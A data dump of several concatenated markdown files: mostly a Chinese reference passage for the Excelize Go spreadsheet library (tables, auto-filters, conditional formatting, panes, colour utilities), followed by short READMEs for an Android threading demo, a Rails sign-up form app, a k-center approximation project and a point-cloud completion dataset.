注意,表格坐标区域至少需要覆盖两行:字符型的标题行和内容行。多个表格的坐标区域不能有交集。
可选参数 `table_name` 用以设置自定义表格名称,同一个工作表内的表格名称应该是唯一的。
Excelize 支持的表格样式 `table_style` 参数:
```text
TableStyleLight1 - TableStyleLight21
TableStyleMedium1 - TableStyleMedium28
TableStyleDark1 - TableStyleDark11
```
## 自动过滤器 {#AutoFilter}
```go
func (f *File) AutoFilter(sheet, hcell, vcell, format string) error
```
根据给定的工作表名、单元格坐标区域和条件格式创建自动过滤器。Excel 中的自动过滤器可以对一些简单的二维数据数据进行数据筛选。
例1,在名称为 `Sheet1` 的工作表 `A1:D4` 区域创建自动过滤器:
<p align="center"><img width="612" src="./images/autofilter_01.png" alt="创建自动过滤器"></p>
```go
err = xlsx.AutoFilter("Sheet1", "A1", "D4", "")
```
例2,在名称为 `Sheet1` 的工作表 `A1:D4` 区域创建带有格式条件的自动过滤器:
```go
err = xlsx.AutoFilter("Sheet1", "A1", "D4", `{"column":"B","expression":"x != blanks"}`)
```
参数 `column` 指定了自动过滤器在过滤范围内的基准列。 Excelize 暂不支持自动过滤器的计算,在设置过滤条件后,如果需要隐藏任何不符合过滤条件的行,可以使用 [`SetRowVisible()`](sheet.md#SetRowVisible) 设置行的可见性。
为列设置过滤条件,参数 `expression` 用于指定过滤条件运算,支持下列运算符:
```text
==
!=
>
<
>=
<=
and
or
```
一个表达式可以包含一个或两个由 `and` 和 `or` 运算符分隔的语句。例如:
```text
x < 2000
x > 2000
x == 2000
x > 2000 and x < 5000
x == 2000 or x == 5000
```
可以通过在表达式中使用空白或非空白值来实现空白或非空白数据的过滤:
```text
x == Blanks
x == NonBlanks
```
Office Excel 还允许一些简单的字符串匹配操作:
```text
x == b* // 以 b 开始
x != b* // 不以 b 开始
x == *b // 以 b 结尾
x != *b // 不以 b 结尾
x == *b* // 包含 b
x != *b* // 不包含 b
```
我们还可以使用 `*` 来匹配任何字符或数字,用
`?` 匹配任何单个字符或数字。除此之外,Office Excel 的自动过滤器不支持其他正则表达式的关键字。 Excel 的正则表达式字符可以使用 `~` 进行转义。
上述示例中的占位符变量 `x` 可以被任何简单的字符串替换。实际的占位符名称在内部被忽略,所以以下所有表达式的效果都是等同的:
```text
x < 2000
col < 2000
Price < 2000
```
## 清除单元格缓存 {#UpdateLinkedValue}
```go
func (f *File) UpdateLinkedValue()
```
Excel 会在保存时将保存带有公式的单元格的计算结果,这会导致在 Office Excel 2007 和 2010 中文档在打开时,即便计算因子已经发生变化,公式的计算结果不会自动更新。参考链接: [https://social.technet.microsoft.com/Forums/office/en-US/e16bae1f-6a2c-4325-8013-e989a3479066/excel-2010-linked-cells-not-updating?forum=excel](https://social.technet.microsoft.com/Forums/office/en-US/e16bae1f-6a2c-4325-8013-e989a3479066/excel-2010-linked-cells-not-updating?forum=excel) 此函数会将工作簿中所有缓存结果清除,这样文档在 Office Excel 中被重新打开时会自动计算新的公式结果,但是由于计算后文档发生了变化,在关闭文档时 Office Excel 会提示是否保存工作簿。
清除单元格缓存对工作簿的影响表现为对 `<v>` 标签的修改,例如,清除前的单元格缓存:
```xml
<row r="19" spans="2:2">
<c r="B19">
<f>SUM(Sheet2!D2,Sheet2!D11)</f>
<v>100</v>
</c>
</row>
```
清除单元格缓存后:
```xml
<row r="19" spans="2:2">
<c r="B19">
<f>SUM(Sheet2!D2,Sheet2!D11)</f>
</c>
</row>
```
## 列名转索引 {#TitleToNumber}
```go
func TitleToNumber(s string) int
```
将工作簿的列名转换为索引(该功能目前不进行值检查)。例如,将列名 `AK` 和 `ak` 转换为 `36`:
```go
excelize.TitleToNumber("AK")
excelize.TitleToNumber("ak")
```
## 索引转列名 {#ToAlphaString}
```go
func ToAlphaString(value int) string
```
将给定的索引值转换为工作簿的列名。例如,将索引值 `36` 转换为 `AK`:
```go
excelize.ToAlphaString(36)
```
## 创建条件格式样式 {#NewConditionalStyle}
```go
func (f *File) NewConditionalStyle(style string) (int, error)
```
通过给定样式为条件格式创建样式,样式参数与 [`NewStyle()`](style.md#NewStyle) 函数的相同。请注意,使用 RGB 色域颜色代码时,目前仅支持设置字体、填充、对齐和边框的颜色。
## 设置条件格式 {#SetConditionalFormat}
```go
func (f *File) SetConditionalFormat(sheet, area, formatSet string) error
```
根据给定的工作表名称、单元格坐标区域和格式参数,为单元格值创建条件格式设置规则。条件格式是 Office Excel 的一项功能,它允许您根据特定条件将格式应用于单元格或一系列单元格。
格式参数 `type` 选项是必需的参数,它没有默认值。允许的类型值及其相关参数是:
<table>
<thead>
<tr>
<th>类型</th>
<th>参数</th>
</tr>
</thead>
<tbody>
<tr>
<td rowspan=4>cell</td>
<td>criteria</td>
</tr>
<tr>
<td>value</td>
</tr>
<tr>
<td>minimum</td>
</tr>
<tr>
<td>maximum</td>
</tr>
<tr>
<td rowspan=4>date</td>
<td>criteria</td>
</tr>
<tr>
<td>value</td>
</tr>
<tr>
<td>minimum</td>
</tr>
<tr>
<td>maximum</td>
</tr>
<tr>
<td>time_period</td>
<td>criteria</td>
</tr>
<tr>
<td rowspan=2>text</td>
<td>criteria</td>
</tr>
<tr>
<td>value</td>
</tr>
<tr>
<td>average</td>
<td>criteria</td>
</tr>
<tr>
<td>duplicate</td>
<td>(none)</td>
</tr>
<tr>
<td>unique</td>
<td>(none)</td>
</tr>
<tr>
<td rowspan=2>top</td>
<td>criteria</td>
</tr>
<tr>
<td>value</td>
</tr>
<tr>
<td rowspan=2>bottom</td>
<td>criteria</td>
</tr>
<tr>
<td>value</td>
</tr>
<tr>
<td>blanks</td>
<td>(none)</td>
</tr>
<tr>
<td>no_blanks</td>
<td>(none)</td>
</tr>
<tr>
<td>errors</td>
<td>(none)</td>
</tr>
<tr>
<td>no_errors</td>
<td>(none)</td>
</tr>
<tr>
<td rowspan=6>2_color_scale</td>
<td>min_type</td>
</tr>
<tr>
<td>max_type</td>
</tr>
<tr>
<td>min_value</td>
</tr>
<tr>
<td>max_value</td>
</tr>
<tr>
<td>min_color</td>
</tr>
<tr>
<td>max_color</td>
</tr>
<tr>
<td rowspan=9>3_color_scale</td>
<td>min_type</td>
</tr>
<tr>
<td>mid_type</td>
</tr>
<tr>
<td>max_type</td>
</tr>
<tr>
<td>min_value</td>
</tr>
<tr>
<td>mid_value</td>
</tr>
<tr>
<td>max_value</td>
</tr>
<tr>
<td>min_color</td>
</tr>
<tr>
<td>mid_color</td>
</tr>
<tr>
<td>max_color</td>
</tr>
<tr>
<td rowspan=5>data_bar</td>
<td>min_type</td>
</tr>
<tr>
<td>max_type</td>
</tr>
<tr>
<td>min_value</td>
</tr>
<tr>
<td>max_value</td>
</tr>
<tr>
<td>bar_color</td>
</tr>
<tr>
<td>formula</td>
<td>criteria</td>
</tr>
</tbody>
</table>
`criteria` 参数用于设置单元格数据的条件格式运算符。它没有默认值,同常与 `{"type":"cell"}` 一起使用,支持的参数为:
文本描述字符|符号表示
---|---
between|
not between|
equal to|==
not equal to|!=
greater than|>
less than|<
greater than or equal to|>=
less than or equal to|<=
可以使用上面表格第一列中的 Office Excel 文本描述字符,或者符号表示方法(`between` 与 `not between` 没有符号表示法)作为条件格式运算符。 下面的相关部分显示了其他条件格式类型的特定标准。
`value`:该值通常与 `criteria` 参数一起使用,可以用确定的值作为设置单元格条件格式的条件参数:
```go
xlsx.SetConditionalFormat("Sheet1", "D1:D10", fmt.Sprintf(`[{"type":"cell","criteria":">","format":%d,"value":"6"}]`, format))
```
`value` 属性也可以是单元格引用:
```go
xlsx.SetConditionalFormat("Sheet1", "D1:D10", fmt.Sprintf(`[{"type":"cell","criteria":">","format":%d,"value":"$C$1"}]`, format))
```
类型:`format` - `format` 参数用于指定满足条件格式标准时将应用于单元格的格式。该参数可以通过 [`NewConditionalStyle()`](utils.md#NewConditionalStyle) 方法来创建:
```go
format, err = xlsx.NewConditionalStyle(`{"font":{"color":"#9A0511"},"fill":{"type":"pattern","color":["#FEC7CE"],"pattern":1}}`)
if err != nil {
fmt.Println(err)
}
xlsx.SetConditionalFormat("Sheet1", "A1:A10", fmt.Sprintf(`[{"type":"cell","criteria":">","format":%d,"value":"6"}]`, format))
```
注意:在 Office Excel 中,条件格式叠加在现有单元格格式上,并非所有单元格格式属性都可以修改。无法在条件格式中修改的属性包括:字体名称、字体大小、上标和下标、对角边框、所有对齐属性和所有保护属性。
Office Excel 中内置了一些与条件格式一起使用的默认样式。可以使用以下 excelize 设置实现这些样式效果:
```go
// 浅红填充色深色文本代表较差
format1, err = xlsx.NewConditionalStyle(`{"font":{"color":"#9A0511"},"fill":{"type":"pattern","color":["#FEC7CE"],"pattern":1}}`)
// 黄填充色深黄色文本代表一般
format2, err = xlsx.NewConditionalStyle(`{"font":{"color":"#9B5713"},"fill":{"type":"pattern","color":["#FEEAA0"],"pattern":1}}`)
// 绿填充色深绿色文本代表较好
format3, err = xlsx.NewConditionalStyle(`{"font":{"color":"#09600B"},"fill":{"type":"pattern","color":["#C7EECF"],"pattern":1}}`)
```
类型:`minimum` - 当条件格式 `criteria` 为 `between` 或 `not between` 时,`minimum` 参数用于设置下限值。
```go
// 高亮单元格条件格式规则: between...
xlsx.SetConditionalFormat("Sheet1", "A1:A10", fmt.Sprintf(`[{"type":"cell","criteria":"between","format":%d,"minimum":"6","maximum":"8"}]`, format))
```
类型:`maximum` - 当条件格式 `criteria` 为 `between` 或 `not between` 时,`maximum` 参数用于设置上限值,参考上面的例子。
类型:`average` - 平均类型用于指定 Office Excel “最前最后规则”中“经典”样式的“仅高于或低于平均值的数值设置格式”条件格式:
```go
// 最前最后规则:高于平均值...
xlsx.SetConditionalFormat("Sheet1", "A1:A10", fmt.Sprintf(`[{"type":"average","criteria":"=","format":%d, "above_average": true}]`, format1))
// 最前最后规则:低于平均值...
xlsx.SetConditionalFormat("Sheet1", "B1:B10", fmt.Sprintf(`[{"type":"average","criteria":"=","format":%d, "above_average": false}]`, format2))
```
类型:`duplicate` - 用于设置“突出显示单元格规则”中的“重复值 ...”:
```go
// 突出显示单元格规则: 重复值...
xlsx.SetConditionalFormat("Sheet1", "A1:A10", fmt.Sprintf(`[{"type":"duplicate","criteria":"=","format":%d}]`, format))
```
类型:`unique` - 用于设置“突出显示单元格规则”中“只为以下内容的单元格设置格式”的“特定文本”:
```go
// 突出显示单元格规则,只为以下内容的单元格设置格式: 特定文本 不等于...
xlsx.SetConditionalFormat("Sheet1", "A1:A10", fmt.Sprintf(`[{"type":"unique","criteria":"=","format":%d}]`, format))
```
类型:`top` - 用于设置“最前最后规则”中的“前 10 项...”或“前 10% ...”:
```go
// 最前最后规则: 前 10 项...
xlsx.SetConditionalFormat("Sheet1", "H1:H10", fmt.Sprintf(`[{"type":"top","criteria":"=","format":%d,"value":"6"}]`, format))
```
设置带有百分比条件的条件格式:
```go
xlsx.SetConditionalFormat("Sheet1", "A1:A10", fmt.Sprintf(`[{"type":"top","criteria":"=","format":%d,"value":"6","percent":true}]`, format))
```
类型:`2_color_scale` - 用于设置带有“双色刻度”的“色阶样式”条件格式:
```go
// 色阶:双色刻度
xlsx.SetConditionalFormat("Sheet1", "A1:A10", `[{"type":"2_color_scale","criteria":"=","min_type":"min","max_type":"max","min_color":"#F8696B","max_color":"#63BE7B"}]`)
```
双色刻度色阶条件格式可选参数:`min_type`、`max_type`、`min_value`、`max_value`、`min_color` 和 `max_color`。
类型:`3_color_scale` - 用于设置带有“三色刻度”的“色阶样式”条件格式:
```go
// 色阶:三色刻度
xlsx.SetConditionalFormat("Sheet1", "A1:A10", `[{"type":"3_color_scale","criteria":"=","min_type":"min","mid_type":"percentile","max_type":"max","min_color":"#F8696B","mid_color":"#FFEB84","max_color":"#63BE7B"}]`)
```
三色刻度色阶条件格式可选参数: `min_type`、`mid_type`、`max_type`、`min_value`、`mid_value`、`max_value`、`min_color`、`mid_color` 和 `max_color`。
类型:`data_bar` - 用于设置“数据条”类型的条件格式。
`min_type` - 参数 `min_type` 在条件格式类型为 `2_color_scale`、`3_color_scale` 或 `data_bar` 时可用。参数 `mid_type` 在条件格式类型为 `3_color_scale` 时可用。例如:
```go
// 数据条:渐变填充
xlsx.SetConditionalFormat("Sheet1", "K1:K10", `[{"type":"data_bar", "criteria":"=", "min_type":"min","max_type":"max","bar_color":"#638EC6"}]`)
```
参数 `min/mid/max_types` 可选值列表:
参数|类型
---|---
min|最低值(仅用于 `min_type`)
num|数字
percent|百分比
percentile|百分点值
formula|公式
max|最高值(仅用于 `max_type`)
`mid_type` - 当条件格式类型为 `3_color_scale` 时使用,与 `min_type` 用法相同,参考上面的表格。
`max_type` - 与 `min_type` 用法相同,参考上面的表格。
`min_value` - 参数 `min_value` 和 `max_value` 在条件格式类型为 `2_color_scale`、`3_color_scale` 或 `data_bar` 时可用。参数 `mid_value` 在条件格式类型为 `3_color_scale` 时可用。
`mid_value` - 在条件格式类型为 `3_color_scale` 时可用,与 `min_value` 的用法相同,参考上述文档。
`max_value` - 与 `min_value` 的用法相同,参考上述文档。
`min_color` - 参数 `min_color` 和 `max_color` 在条件格式类型为 `2_color_scale`、`3_color_scale` 或 `data_bar` 时可用。参数 `mid_color` 在条件格式类型为 `3_color_scale` 时可用。例如:
```go
// 色阶:三色刻度
xlsx.SetConditionalFormat("Sheet1", "B1:B10", `[{"type":"3_color_scale","criteria":"=","min_type":"min","mid_type":"percentile","max_type":"max","min_color":"#F8696B","mid_color":"#FFEB84","max_color":"#63BE7B"}]`)
```
`mid_color` - 当条件格式类型为 `3_color_scale` 时使用。与 `min_color` 用法相同,参考上述文档。
`max_color` - 与 `min_color` 用法相同,参考上述文档。
`bar_color` - 当条件格式类型为 `data_bar` 时使用。与 `min_color` 用法相同,参考上述文档。
## 设置窗格 {#SetPanes}
```go
func (f *File) SetPanes(sheet, panes string)
```
通过给定的工作表名称和窗格样式参数设置冻结窗格或拆分窗格。
`activePane` 定义了活动窗格,下表为该属性的可选值:
枚举值|描述
---|---
bottomLeft (Bottom Left Pane) |当应用垂直和水平分割时,位于左下方的窗格。<br><br>此值也适用于仅应用了水平分割的情况,将窗格分为上下两个区域。在这种情况下,该值指定底部窗格。
bottomRight (Bottom Right Pane) | 当垂直和水平时,位于底部右侧的窗格。
topLeft (Top Left Pane)|当应用垂直和水平分割时,位于左上方的窗格。<br><br>此值也适用于仅应用了水平分割的情况,将窗格分为上下两个区域。在这种情况下,该值指定顶部窗格。<br><br>此值也适用于仅应用垂直分割的情况,将窗格分割为右侧和左侧区域。在这种情况下,该值指定左侧窗格。
topRight (Top Right Pane)|当应用垂直和水平分割时,位于右上方窗格。<br><br> 此值也适用于仅应用垂直分割的情况,将窗格分割为右侧和左侧区域。在这种情况下,该值指定右侧窗格。
窗格状态类型仅限于下表中当前列出的受支持的值:
枚举值|描述
---|---
frozen (Frozen)|窗格被冻结,但并不分裂。在此状态下,当窗格被解除冻结然后再次解冻时,会生成单个窗格,而不会被分割。<br><br>在这种状态下,分割条不可调节。
split (Split)|窗格被分裂,但并不冻结。在此状态下,用户可以调整分割条。
`x_split` - 水平分割点的位置。如果窗格冻结,则此值用于设置顶部窗格中可见的列数。
`y_split` - 垂直分割点的位置。如果窗格冻结,则此值用于设置左侧窗格中可见的行数。该属性的可能值由 W3C XML Schema double 数据类型定义。
`top_left_cell` - 处于“从左到右”模式时,右下方窗格中左上角可见单元格的位置。
`sqref` - 参考单元格坐标区域。可以是非连续的一组单元格坐标区域。
例1,在名为 `Sheet1` 的工作表上冻结列 `A` 并设置活动单元格 `Sheet1!K16`:

```go
xlsx.SetPanes("Sheet1", `{"freeze":true,"split":false,"x_split":1,"y_split":0,"top_left_cell":"B1","active_pane":"topRight","panes":[{"sqref":"K16","active_cell":"K16","pane":"topRight"}]}`)
```
例2,在名为 `Sheet1` 的工作表上冻结第 1 到第 9 行,并设置活动单元格区域 `Sheet1!A11:XFD11`:

```go
xlsx.SetPanes("Sheet1", `{"freeze":true,"split":false,"x_split":0,"y_split":9,"top_left_cell":"A34","active_pane":"bottomLeft","panes":[{"sqref":"A11:XFD11","active_cell":"A11","pane":"bottomLeft"}]}`)
```
例3,在名为 `Sheet1` 的工作表上创建拆分窗格,并设置活动单元格 `Sheet1!J60`:

```go
xlsx.SetPanes("Sheet1", `{"freeze":false,"split":true,"x_split":3270,"y_split":1800,"top_left_cell":"N57","active_pane":"bottomLeft","panes":[{"sqref":"I36","active_cell":"I36"},{"sqref":"G33","active_cell":"G33","pane":"topRight"},{"sqref":"J60","active_cell":"J60","pane":"bottomLeft"},{"sqref":"O60","active_cell":"O60","pane":"bottomRight"}]}`)
```
例4,解冻并删除名为 `Sheet1` 上的所有窗格:
```go
xlsx.SetPanes("Sheet1", `{"freeze":false,"split":false}`)
```
## 色值计算 {#ThemeColor}
```go
func ThemeColor(baseColor string, tint float64) string
```
通过给定的 RGB 格式色值与色调参数,计算出最终颜色。例如,获取名为 `Sheet1` 的工作表 `A1` 单元格的背景颜色:
```go
package main
import (
"fmt"
"github.com/360EntSecGroup-Skylar/excelize"
)
func main() {
xlsx, _ := excelize.OpenFile("Book1.xlsx")
fmt.Println(getCellBgColor(xlsx, "Sheet1", "C1"))
}
func getCellBgColor(xlsx *excelize.File, sheet, axix string) string {
styleID := xlsx.GetCellStyle(sheet, axix)
fillID := xlsx.Styles.CellXfs.Xf[styleID].FillID
fgColor := xlsx.Styles.Fills.Fill[fillID].PatternFill.FgColor
if fgColor.Theme != nil {
srgbClr := xlsx.Theme.ThemeElements.ClrScheme.Children[*fgColor.Theme].SrgbClr.Val
return excelize.ThemeColor(srgbClr, fgColor.Tint)
}
return fgColor.RGB
}
```
## RGB与HSL色彩空间色值转换 {#RGBToHSL}
```go
func RGBToHSL(r, g, b uint8) (h, s, l float64)
```
该函数提供方法将 RGB 色彩空间三元组转换为 HSL 色彩空间三元组。
## HSL与RGB色彩空间色值转换 {#HSLToRGB}
```go
func HSLToRGB(h, s, l float64) (r, g, b uint8)
```
该函数提供方法将 HSL 色彩空间三元组转换为 RGB 色彩空间三元组。
## 文件 Writer {#FileWriter}
### Write {#Write}
```go
func (f *File) Write(w io.Writer) error
```
该函数提供方法将当前文件内容写入给定的 `io.Writer`。
### WriteTo {#WriteTo}
```go
func (f *File) WriteTo(w io.Writer) (int64, error)
```
该函数通过实现 `io.WriterTo` 以保存文件。
### WriteToBuffer {#WriteToBuffer}
```go
func (f *File) WriteToBuffer() (*bytes.Buffer, error)
```
该函数提供获取当前文件内容 `*bytes.Buffer` 的方法。
| 25.315625 | 491 | 0.6119 | yue_Hant | 0.339699 |
9734651dfb012410b57d889dde29022aef18b932 | 147 | md | Markdown | README.md | liuxuanhai/JniThread_mult | b2ef80a2ab231f4a4272eac60885bb54c5c8b959 | [
"Apache-2.0"
] | null | null | null | README.md | liuxuanhai/JniThread_mult | b2ef80a2ab231f4a4272eac60885bb54c5c8b959 | [
"Apache-2.0"
] | null | null | null | README.md | liuxuanhai/JniThread_mult | b2ef80a2ab231f4a4272eac60885bb54c5c8b959 | [
"Apache-2.0"
] | null | null | null | Android C++多线程按顺序退出并释放资源
### 博客地址:
#### [Android C++多线程按顺序退出并释放资源](https://blog.csdn.net/ywl5320/article/details/80460918)
### create By ywl5320
| 21 | 87 | 0.721088 | yue_Hant | 0.233918 |
9734b782a3666231a1c2f9ffdc87f6cb00a9c4a8 | 1,575 | md | Markdown | content/project/k-center/index.md | kirtanp/starter-academic | f31927d3ad399aa7ae4e52da7bcc0897230c93a5 | [
"MIT"
] | null | null | null | content/project/k-center/index.md | kirtanp/starter-academic | f31927d3ad399aa7ae4e52da7bcc0897230c93a5 | [
"MIT"
] | null | null | null | content/project/k-center/index.md | kirtanp/starter-academic | f31927d3ad399aa7ae4e52da7bcc0897230c93a5 | [
"MIT"
] | null | null | null | ---
title: Facility location on graphs
summary: A new approximation algorithm for the uniform capacity k-center problem
tags:
- theory
date: "2015-06-01T00:00:00Z"
# Optional external URL for project (replaces project detail page).
external_link: ""
image:
caption:
focal_point: Smart
links:
#- icon: twitter
# icon_pack: fab
# name: Follow
# url:
url_code: ""
url_pdf: "/files/k-center.pdf"
url_slides: ""
url_video: ""
# Slides (optional).
# Associate this project with Markdown slides.
# Simply enter your slide deck's filename without extension.
# E.g. `slides = "example-slides"` references `content/slides/example-slides.md`.
# Otherwise, set `slides = ""`.
#slides: example
---
hek-center problem is that of choosing k vertices as centers in a weighted undirected graph in which the edge weights obey the triangle inequality so that the maximum distance of any vertex to its nearest center is minimized. The problem is NP-hard, but there is a simple greedy 2-approximation algorithm which has been shown to be optimal. We consider here the capacitated k-center problem, where additionally each vertex has a capacity, which is a bound on the number of ‘clients’ it can serve if it is opened as a center. Unlike the uncapacitated k-center problem, our understanding of the capacitated version is far from complete. We mainly concern ourselves with the case when all capacities are equal, which is called the uniform capacity k-center problem. We give here an L-approximation for the uniform k-center problem where each vertex has capacity L.
| 46.323529 | 867 | 0.76381 | eng_Latn | 0.998861 |
973563b02e6cf566b1fb96aa43aa97746243dce4 | 1,789 | md | Markdown | README.md | oxenprogrammer/basic-form | aac28bf3d3882cad72c65ddd0e3c42be45b2e6d7 | [
"MIT"
] | null | null | null | README.md | oxenprogrammer/basic-form | aac28bf3d3882cad72c65ddd0e3c42be45b2e6d7 | [
"MIT"
] | null | null | null | README.md | oxenprogrammer/basic-form | aac28bf3d3882cad72c65ddd0e3c42be45b2e6d7 | [
"MIT"
] | 1 | 2021-02-25T01:33:45.000Z | 2021-02-25T01:33:45.000Z | 
# A Basic Form App With Rails
> The use of rails to create a basic form for signing up new users.
## Built With
- Ruby 3.0
- Ruby on Rails 6.1
- SQLite 3
## Getting Started
To get a local copy up and running follow these simple steps.
### Prerequisites
- Ruby on Rails v 6.x. For more information on how to install Ruby on Rails, please follow this [link](https://guides.rubyonrails.org/getting_started.html)
### Setup and Install
- Clone this repository using the link above (click on the 'code' button).
- Open a terminal and `cd` to the cloned repository.
- Run `yarn` to install other dependencies.
- Run `bundle install` to install the dependencies.
- Run `db:create` to create the database
- Run `bin/rails db:migrate` to migrate the database.
- Run the server using `rails s`
### Usage
- To test the Models using the console run `rails c`.
- To edit user, naviagate to `server-ip/:id/edit`
- `server-ip` could be `127.0.0.1:3000` and `id` is the user id
- GO to your browser and paste this address: http://127.0.0.1:3000/.
- Fill out the form and then submit.
## Authors
👤 **Paul Clue**
- GitHub: [@Paul-Clue](https://github.com/Paul-Clue/)
- LinkedIn: [Paul clue](https://www.linkedin.com/in/paul-clue-5136a01b1/)
👤 **Emanuel Okello**
- GitHub: [@oxenprogrammer](https://github.com/oxenprogrammer)
- Twitter: [@ox_emmy](https://twitter.com/ox_emmy)
- LinkedIn: [Emanuel Okello](https://www.linkedin.com/in/emanuel-okello/)
## 🤝 Contributing
Contributions, issues, and feature requests are welcome!
Feel free to check the [issues page](https://github.com/oxenprogrammer/basic-form/issues).
## Show your support
Give a ⭐️ if you like this project!
## 📝 License
This project is [MIT](LICENSE) licensed. | 27.106061 | 155 | 0.71716 | eng_Latn | 0.910642 |
9735b697acbec77e0c0e3d8e1b2090c6f03bcaa9 | 383 | md | Markdown | _posts/2019-10-15-TIL.md | apalsl/apalsl.github.io | a91bb88742fa64315640a3b53a3ee84f8c047b97 | [
"MIT"
] | null | null | null | _posts/2019-10-15-TIL.md | apalsl/apalsl.github.io | a91bb88742fa64315640a3b53a3ee84f8c047b97 | [
"MIT"
] | null | null | null | _posts/2019-10-15-TIL.md | apalsl/apalsl.github.io | a91bb88742fa64315640a3b53a3ee84f8c047b97 | [
"MIT"
] | null | null | null | ---
title: "20191015 TIL"
layout: post
tag: til
---
### 2019-10-15 (화)
#### 오늘 한 일
- VSCODE 에러해결방법을 찾았다. SSH로 연결된 VSCODE가 무슨짓을 해도 열리지 않았지만 그냥 다른폴더에서 VSCODE를 실행한 후 SSH를 다시 연결해서 해결하였다.
- 알고리즘 스터디가 밀렸다.
- httpie를 windows에 설치하였다. pip 명령어가 필요해서 파이썬을 추가로 설치했다.
- 과연 httpie가 windows에서 효율적인지 모르겠다. 부가적인것을 너무 많이 설치한 느낌?
#### 내일 할 일
- http 테스트를 할 수 있는 방법을 정리
- 집에 VM 설치
- Toy Project idea
| 19.15 | 99 | 0.673629 | kor_Hang | 1.00001 |
9736312f9edfaff56e164572e727c10837e0f709 | 2,676 | md | Markdown | data/README.md | jamesbraza/pcn | 78611399e31fd3c5d732dd7961419cdeada4f6e5 | [
"MIT"
] | null | null | null | data/README.md | jamesbraza/pcn | 78611399e31fd3c5d732dd7961419cdeada4f6e5 | [
"MIT"
] | null | null | null | data/README.md | jamesbraza/pcn | 78611399e31fd3c5d732dd7961419cdeada4f6e5 | [
"MIT"
] | null | null | null | # Datasets
## Data Set Up
I recommend making soft links from here to the actual data directories:
```bash
# PCN dataset (.lmdb files)
ln -s /abs/path/to/pcn_data pcn
# Completion3D datasets (.h5 files)
ln -s /abs/path/to/completion3d_2048k_data completion3d_2048k
ln -s /abs/path/to/completion3d_16384k_data completion3d_16384k
# Trained models
ln -s /abs/path/to/trained_models trained_models
```
## PCN
This directory is used to store data, trained models and results files downloaded from this [Google Drive folder](https://drive.google.com/open?id=1Af9igOStb6O9YHwjYHOwR0qW4uP3zLA6), which is organized as follows:
```
data
|-- kitti
|-- bboxes
|-- cars
|-- tracklets
|-- shapenet
|-- test
|-- partial
|-- complete
|-- test_novel
|-- partial
|-- complete
|-- test.list
|-- test_novel.list
|-- train.list
|-- train.lmdb
|-- valid.list
|-- valid.lmdb
|-- shapenet-car
|-- train.list
|-- train.lmdb
|-- valid.list
|-- valid.lmdb
|-- trained_models
|-- results
|-- kitti
|-- shapenet_test
|-- shapenet_test_novel
```
`kitti` contains processed data from the `2011_09_26_drive_0009` LiDAR sequence in the [KITTI](http://www.cvlibs.net/datasets/kitti/raw_data.php) dataset. `cars` contains raw point clouds of labeled cars in the sequence. `bboxes` contains the corresponding bounding boxes. `tracklets` contains the IDs of point clouds that belong to the same car instance.
`shapenet` contains training and testing data created from synthetic models in [ShapeNetCore.v1](https://shapenet.org). There are four lists of model IDs: `train.list` contains 28974 models used for training; `valid.list` contains 800 models used for training; `test.list` contains 1200 models used for testing; and `test_novel.list` contains additional 1200 test models from shape categories not seen during training. Training and validation data are processed into `lmdb` format for more efficient data loading. Testing data are stored as point clouds in `pcd` format and put into two folders, where `partial` contains partial inputs and `complete` contains complete ground truths.
`shapenet_car` contains training and validation data for the car category only.
`trained_models` contains trained model weights that can be loaded with `tf.Saver`.
`results` contains outputs (completed point clouds) of the trained models on the KITTI sequence and the ShapeNet test set.
## Completion3D
The Python modules `pcn_data.py` and `completion3d_data.py` contain relevant starter code.
| 41.169231 | 683 | 0.70441 | eng_Latn | 0.979077 |
973657c809c563b4eaaf0a0ca6a5111dbb26836d | 1,258 | md | Markdown | AlchemyInsights/credit-refund.md | pebaum/OfficeDocs-AlchemyInsights-pr.vi-VN | c65ba4cf57d2c3d390dbf0c2dce01e3f016b8802 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | AlchemyInsights/credit-refund.md | pebaum/OfficeDocs-AlchemyInsights-pr.vi-VN | c65ba4cf57d2c3d390dbf0c2dce01e3f016b8802 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | AlchemyInsights/credit-refund.md | pebaum/OfficeDocs-AlchemyInsights-pr.vi-VN | c65ba4cf57d2c3d390dbf0c2dce01e3f016b8802 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Tín dụng/tiền hoàn lại
ms.author: cmcatee
author: cmcatee-MSFT
manager: mnirkhe
ms.date: 04/21/2020
ms.audience: ITPro
ms.topic: article
ROBOTS: NOINDEX, NOFOLLOW
localization_priority: Normal
ms.custom:
- "897"
- "1500035"
ms.assetid: 5f76890d-3f85-430b-95fd-dcab42624745
ms.openlocfilehash: beb3574cb94f5ede8282ab29feba6d3ac0e589a9
ms.sourcegitcommit: cc7b6f00275adaab90f702d48e65500434f11e83
ms.translationtype: MT
ms.contentlocale: vi-VN
ms.lasthandoff: 05/06/2020
ms.locfileid: "44086838"
---
# <a name="creditrefund"></a>Tín dụng/tiền hoàn lại
**Hủy bỏ**
Khi hủy đăng ký, bạn sẽ nhận được hóa đơn cuối cùng với tín dụng do vào ngày thanh toán tiếp theo. Việc này có thể mất đến 30 ngày để nhận được từ ngày đăng ký bị hủy.
**Thay đổi chỗ ngồi**
Khi giấy phép bị xóa khỏi đăng ký, thời gian không sử dụng trên các giấy phép này sẽ được tính như một khoản tín dụng trên hóa đơn tiếp theo. Việc này có thể mất đến 30 ngày để nhận được từ ngày giấy phép bị xóa.
**Hoàn**
**Bất kỳ tín dụng theo tỷ lệ nào sẽ được trả lại cho bạn trong chu kỳ thanh toán kế tiếp.**
Để biết thêm thông tin, xem [quy trình hủy và hoàn tiền](https://docs.microsoft.com/microsoft-365/commerce/subscriptions/cancel-your-subscription?view=o365-worldwide).
| 34 | 212 | 0.762321 | vie_Latn | 0.999997 |
973690ba4b55102f770c3e645efb1c7a131b5770 | 18 | md | Markdown | README.md | Meersy/Meersy.github.io | f712d7849b41f6fa191e9381a2b57e0ff307d464 | [
"MIT"
] | null | null | null | README.md | Meersy/Meersy.github.io | f712d7849b41f6fa191e9381a2b57e0ff307d464 | [
"MIT"
] | null | null | null | README.md | Meersy/Meersy.github.io | f712d7849b41f6fa191e9381a2b57e0ff307d464 | [
"MIT"
] | null | null | null | # Meersy.github.io | 18 | 18 | 0.777778 | vie_Latn | 0.249935 |
9737188229f510ed5b282e179b1bfc3029302533 | 341 | md | Markdown | docs/_docs/reference/class.Facebook.HackCodegen.CodegenFile.render.md | aloiret/hack-codegen | 4195c1789b73b4d892d48d75169d229a4b9fc16e | [
"MIT"
